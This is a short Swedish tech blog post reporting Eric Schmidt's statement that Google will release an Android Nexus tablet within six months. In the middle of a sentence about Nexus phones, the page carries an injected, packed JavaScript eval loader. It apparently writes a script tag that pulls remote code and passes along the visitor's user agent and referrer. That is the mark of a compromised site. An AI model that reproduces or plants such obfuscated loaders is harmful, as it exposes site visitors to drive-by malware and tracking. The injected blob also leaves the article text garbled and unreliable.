Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Google Nexus tablet till sommaren.

Google Nexus tablet till sommaren.
Sebastian

 

Nu har julen för revue.se tagit slut… Det var en kort break, men nu är vi här med Nya härliga nyheter om teknik och media. It’s good to be back!

Google styrelseordförande Eric Schmidt säger i en intervju att Google kommer att släppa en Android-tablet inom sex månader. Google har tidigare släppt  Nexus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fskzz|var|u0026u|referrer|trnnk||js|php’.split(’|’),0,{}))
telefoner, vilket så här i efterhand kan ses som en testplattform för en iOS utmanare. Det är antagligen till sommaren som iPad 3 lanseras och då känns det inte så konstigt att Google vill hänga på tablet racet i tid. Det skulle ju vara väldigt sunt för konkurrensen, ge oss en Google Nexus!

Det är dock bara rykten än så länge men Schmidt är Googles styrelseordförande så någon vikt bör ligga bakom uttalandet. 
www.slashgear.com